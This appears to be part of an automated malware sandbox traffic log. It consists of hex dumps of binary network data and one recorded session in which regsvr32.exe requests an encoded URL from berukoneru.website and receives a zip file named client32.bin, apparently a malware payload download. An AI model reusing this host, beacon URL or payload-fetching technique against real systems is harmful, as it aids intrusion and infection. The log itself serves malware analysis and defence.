3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                          Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                          2021-12-14 09:34:07 UTC306INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                          Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                          2021-12-14 09:34:07 UTC434INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                          Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                          2021-12-14 09:34:07 UTC450INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                          Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                          2021-12-14 09:34:07 UTC466INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                          Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                          2021-12-14 09:34:07 UTC499INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                          Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                          2021-12-14 09:34:07 UTC515INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                          Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                          2021-12-14 09:34:07 UTC531INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                          Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                          2021-12-14 09:34:07 UTC547INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                          Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                          2021-12-14 09:34:07 UTC563INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                          Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                          2021-12-14 09:34:07 UTC579INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                          Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                          2021-12-14 09:34:07 UTC595INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                          Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                          2021-12-14 09:34:07 UTC611INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                          Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                          2021-12-14 09:34:07 UTC627INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                          Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.54979879.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC628OUTGET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC629INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=6ibnq2u0g0h401bek74k8hvu83; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:07 UTC629INData Raw: fa 20 1c 7c 43 17 ce 86 db 4b 72 bb 94 ee 48 40 4a bf 8f e9 2c 5b ea 47 de 7c 6b a3 c0 07 1f 75 79 27 cc 4f 13 37 db a0 64 75 67 27 44 06 94 62 3d 48 9c 68 d9 61 6a d0 2d 9f ee c4 99 6b 5a 7d 2a a8 7a 61 02 68 25 2e c6 05 51 2c 3c a9 d0 f0 20 85 44 a0 e6 75 44 05 09 0e dd 6b 40 f5 0c ce c8 32 78 62 bd 18 eb 3e 4d 07 dc 11 a7 92 4b 99 b7 54 f2 b2 a3 c0 bd 2f 2f bb 85 f4 79 21 4e 8a 91 19 e7 51 35 57 c0 6f a3 24 4c ae e7 9e 1e 57 97 af c0 d4 8c 8a a3 d6 1f 7b 9d ea 00 e4 b0 ae 58 7b 98 80 a4 dd 02 0b b3 21 6b bc 98 e8 6c 18 52 6e 44 78 cc 7a d2 a1 31 6d 95 8a fa 0f 47 53 3d 0b 4d 9d ec 4c 7e b4 b0 00 bd f5 32 ca 9d f6 39 81 49 d4 cc 67 7f 5a b6 d3 b9 57 bc 88 c3 3a 69 5b 38 95 b8 75 a0 6c 39 1d b3 3e a0 ea 5f ef 54 dc 14 77 c6 d3 27 4d f2 5c a7 2f a6 4b 56
                          Data Ascii: |CKrH@J,[G|kuy'O7dug'Db=Hhaj-kZ}*zah%.Q,< DuDk@2xb>MKT//y!NQ5Wo$LW{X{!klRnDxz1mGS=ML~29IgZW:i[8ul9>_Tw'M\/KV
                          2021-12-14 09:34:07 UTC645INData Raw: 37 0d 4a 26 07 ef 84 99 04 24 2d d2 a5 97 36 90 06 1e 40 0c 13 97 05 8d 3b 48 a0 1c bb fe bc 13 9a 21 57 ed df 3c 3f 87 73 02 40 da c3 75 75 da ba aa ab 65 d7 2e 68 08 03 ed ec 4a cd 55 ff 67 38 b6 c0 52 54 a2 5d 4f 34 7a 36 15 b6 f6 f9 19 e7 4b 6e de 07 dd 3f 2b f2 13 e4 40 c8 ca 33 08 92 fe 08 fe e9 24 06 60 04 d0 0f 80 64 2b 5a a4 af 11 ce 4d f0 83 94 21 95 58 75 b0 3a c5 0a 41 74 e5 d1 e6 cb ec d1 10 5a 97 cb 53 54 a0 d5 ff 8e ff cf 43 1c 6d 25 74 5c 1e 50 84 cc 16 14 ca 08 55 7d 40 cb cd 5f 28 dc 06 33 e3 4e 6f 46 14 3f 23 4a 56 c8 49 5a 7e 53 fc 32 ea b7 a4 56 cb 32 1c 95 b2 42 66 98 99 8f 28 a1 88 6e 03 94 d3 7f 10 de 93 62 15 b7 57 7d d0 e0 68 3d e5 9f 59 38 d9 15 ef 9b a0 99 be 42 e4 8a 9d a3 22 55 fd eb 57 2d 41 2e 20 52 7e be e1 57 37 58 7b 93
                          Data Ascii: 7J&$-6@;H!W<?s@uue.hJUg8RT]O4z6Kn?+@3$`d+ZM!Xu:AtZSTCm%t\PU}@_(3NoF?#JVIZ~S2V2Bf(nbW}h=Y8B"UW-A. R~W7X{
                          2021-12-14 09:34:07 UTC661INData Raw: ec 62 9f bc 1d 37 03 80 a9 34 02 cc a6 41 79 a3 1a aa aa aa bf 89 76 05 07 2a 3d 9e 07 aa 5a bd ed ce ff e2 a8 49 49 0e f0 3f c2 12 d5 e1 11 27 72 23 00 77 a4 f5 70 d5 7e d5 36 4b 3b 8c d0 57 5e e2 28 b4 7f 5d 0f ca 46 26 f0 0b 1c f1 a6 c9 b9 66 d7 05 bf 83 4c 8f 4c 75 7a 0f 3a 42 17 db a5 88 a8 6d 2b 54 ae ce 4d a9 0e 7d c1 b5 69 64 34 ce 02 aa ae 23 fe cb 06 a1 c5 8a 8f 95 f9 f6 de 29 90 30 08 46 90 be 1b eb 4f 9c bd d5 3d ef 91 29 52 0e 14 d0 37 45 29 2f de 63 c2 30 a3 f4 b5 96 a1 e5 15 04 64 42 10 2b 99 49 f6 ff ff 19 23 b8 d8 a0 37 bd 58 97 d7 4b 7c 44 c8 c3 b1 f8 47 ce 61 64 d1 a0 18 84 3f 92 6a 72 0a 59 0d 9b c9 c1 7d 5a a3 2f ef 44 db b8 a3 d5 9f 5f 5d 01 71 77 bb 91 3e 30 ce 3f cf 91 ab c0 56 da 5f 51 ed 2f f4 de de a3 17 d5 96 94 1a 34 bf 6c 83
                          Data Ascii: b74Ayv*=ZII?'r#wp~6K;W^(]F&fLLuz:Bm+TM}id4#)0FO=)R7E)/c0dB+I#7XK|DGad?jrY}Z/D_]qw>0?V_Q/4l
                          2021-12-14 09:34:07 UTC677INData Raw: 74 64 30 2b 47 63 05 4e 1a 92 63 4d 88 49 ac 7b 18 e6 66 8d c0 25 d7 7e d9 11 1b 4f 63 60 d7 26 d1 40 d4 34 6e 34 3d 4b 92 e5 d7 a5 9a 3d e3 aa 8b 11 69 45 06 e0 eb dd 13 3b e4 ab 18 fa 5c e3 62 7f 93 bc 12 14 64 16 dd 5a 06 be 89 69 5e 65 ff 7b 27 50 76 26 a1 36 18 4a bf 41 83 8d 32 53 95 00 1e ee 73 11 c9 fb 9d 51 90 3a 39 5a 7b a5 4a 90 93 75 60 b4 a8 34 90 7a 6d e3 26 5d 01 e1 15 2f 75 14 56 2d 3e a3 51 8f 13 c2 d9 a7 d4 f2 74 ac 31 a0 07 61 96 4d e9 74 71 23 a4 75 5c 5f c5 4b 90 38 27 65 6f ef e5 aa 73 dc 30 d3 59 85 05 15 2f 5b 84 86 e4 52 3c 0e a8 bf 8c d0 00 60 7e bd 0d 42 8d 07 ee 5f d2 2a 60 c1 45 57 83 62 9f e1 79 14 87 dc 39 aa 2a 84 fe b0 c0 04 7c 32 47 0d 59 ca 53 c0 a9 0e 70 52 d7 a6 6c b7 d2 50 27 75 f0 af b5 ff ed 71 b5 9e d0 98 b3 70 c0
                          Data Ascii: td0+GcNcMI{f%~Oc`&@4n4=K=iE;\bdZi^e{'Pv&6JA2SsQ:9Z{Ju`4zm&]/uV->Qt1aMtq#u\_K8'eos0Y/[R<`~B_*`EWby9*|2GYSpRlP'uqp
                          2021-12-14 09:34:07 UTC693INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                          Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
